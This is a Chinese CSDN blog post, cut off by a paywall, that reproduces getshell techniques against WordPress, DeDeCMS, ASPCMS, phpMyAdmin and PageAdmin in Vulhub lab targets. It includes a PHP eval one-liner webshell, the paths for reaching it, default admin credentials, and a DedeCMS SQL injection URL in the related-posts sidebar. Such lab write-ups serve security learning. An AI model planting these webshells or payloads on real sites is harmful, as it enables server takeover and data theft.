常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)

最新推荐文章于 2025-03-20 19:34:36 发布
最新推荐文章于 2025-03-20 19:34:36 发布
阅读量2k 收藏 30
点赞数 29
文章标签: 常见CMS漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140913638
版权

目录

一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

步骤三:访问以下连接即可获取WebShel...

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

步骤二:安装成功后访问主题下的网站后门文件..

二:DeDeCMS

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

姿势二:修改模板文件拿WebShel

步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下

步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

步骤三:使用蚁剑进行连接测试.

姿势三:后台任意命令执行拿WebShell

步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

步骤三:使用蚁剑连接测试...

三:ASPCMS

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)

步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...

步骤四:访问以下地址进行连接...

四、PHPMyadmin

姿势⼀:通过⽇志⽂件拿Shell

姿势⼆:导⼊导出拿WebShell

1.首先判断mysql位置

2.猜测web路径

3.写webshell

4.浏览器

姿势三:界面图像化GetShell

五、Pageadmin

步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。

步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】

步骤三:解压文件。

步骤四:使用工具连接。

一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

#执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

#靶场地址

http://192.168.4.176:8080/wp-admin/

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

在其404模板中插入一句话木马代码.点击【更新文件】按钮

<?php eval($ POST['cmd']);?>

步骤三:访问以下连接即可获取WebShel...

#拼接路径

/wp-content/themes/twentyfifteen/404.php

#访问连接

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

菜刀连接:

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

主题文件

步骤二:安装成功后访问主题下的网站后门文件..

#拼接路径

/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#访问地址

http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#蚁剑连接

二:DeDeCMS

漏洞复现

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

#前台

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

#后台

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

#信息

username:admin

password:admin

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

#文件地址

最低0.47元/天 解锁文章
Meet.meet
关注
dedecms 漏洞汇总
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
Web-CMS漏洞
凌云鹤YK
02-21 8573
Web-CMS漏洞Web-CMS漏洞漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞漏洞二:ThinkPHP 5 &lt;=5.0.22 远程代码执行高危漏洞漏洞三:微擎最新版SQL注入漏洞四:微擎1.5.4任意用户删除漏洞 Web-CMS漏洞 漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞 Url:https:/...
wordpress漏洞getshell
最新发布
qq_59671410的博客
03-20 156
1.在docker启动靶场,使用9595端口,访问。4.我们在网络搜索可得,该PHP文件的目录位置。5.我们拼接url,访问该页面,访问成功。3.我们输入一句话木马,并保存。2.发现他的模板文件可以修改。6.用蚁剑尝试连接,成功。
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3935
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
常见CMS漏洞
lhdbk______的博客
08-03 1115
常见CMS漏洞
CMS漏洞总结
include_voidmain的博客
08-01 5026
CMS漏洞总结
DeDeCMS漏洞
weixin_53198216的博客
08-03 275
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
PageAdmin 企业级CMS网站管理系统 4.0.08
11-06
首先,PageAdmin CMS基于微软的ASP.NET技术框架,这使得它具备了高性能、稳定性和安全性。ASP.NET是微软推出的一种服务器端Web应用程序框架,支持多种编程语言,如C#、VB.NET等,为开发者提供了丰富的工具和库,简化...
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
AspCMS commentList.asp SQL注入漏洞.md
04-08
AspCMS commentList.asp SQL注入漏洞.md
ASP网站CMS程序源码——Dedecms v4.0视频教程实例开发.zip
10-17
【ASP网站CMS程序源码——Dedecms v4.0视频教程实例开发】 DedeCMS,全称“织梦内容管理系统”,是一款基于ASP(Active Server Pages)技术的开源网站内容管理软件。这个压缩包“ASP网站CMS程序源码——Dedecms v...
DeDe-cms 漏洞
weixin_69065643的博客
08-03 308
找到index.html修改。我们写一个一句话木马,点击访问后使用工具连接。
常见cms
qq_50854662的博客
04-02 816
什么是CMSCMS是Content Management System的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。 常见CMS有哪些? asp平台:动易CMS、创力CMS、科汛CMS、新云CMS; php平台:phpcms、织梦CMS、帝国CMS、php168 CMS; ASP.NET平台:Zoomla!逐浪CMS、动易CMS、风讯CMS、We7 CMS; ...
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 9018
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
李火火的安全圈
05-31 4095
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
wordpress 漏洞
09-03
关于WordPress漏洞,有一些常见的安全问题需要注意。首先,确保你的WordPress核心、主题和插件都是最新版本,因为更新通常包含了修复漏洞的补丁。同时,避免使用来自不受信任的来源的主题和插件,因为它们可能包含恶意代码。 另外,强化你的登录过程是很重要的。使用强密码,并启用双因素身份验证以提高安全性。此外,限制登录尝试次数并锁定账户可以防止暴力破解攻击。 定期备份你的网站数据也是必要的,这样即使遭受攻击或出现问题,你仍然能够恢复数据。 还有其他一些安全措施可以采取,例如限制文件和目录的访问权限,禁用文件编辑功能,通过使用安全插件来增强安全性等等。总之,保持WordPress和相关组件的更新,并采取适当的安全措施是确保网站安全的关键。如有任何具体漏洞问题,可以提供更多细节以便我作出具体建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值